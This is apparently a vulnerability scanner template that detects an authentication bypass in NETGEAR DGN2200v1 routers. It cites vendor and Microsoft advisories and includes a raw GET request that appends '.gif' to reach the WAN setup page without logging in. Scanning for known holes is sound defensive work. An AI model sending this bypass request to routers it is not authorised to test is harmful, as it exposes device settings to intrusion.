id: netgear-router-auth-bypass info: name: NETGEAR DGN2200v1 - Authentication Bypass author: gy741 severity: high description: NETGEAR DGN2200v1 router contains an authentication bypass vulnerability. It does not require authentication if a page has ".jpg", ".gif", or "ess_" substrings but matches the entire URL. Any page on the device can therefore be accessed, including those that require authentication, by appending a GET variable with the relevant substring. reference: - https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ - https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cwe-id: CWE-287 tags: netgear,auth-bypass,router http: - raw: - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /WAN_wan.htm?.gif HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "WAN Setup" # Enhanced by md on 2022/10/19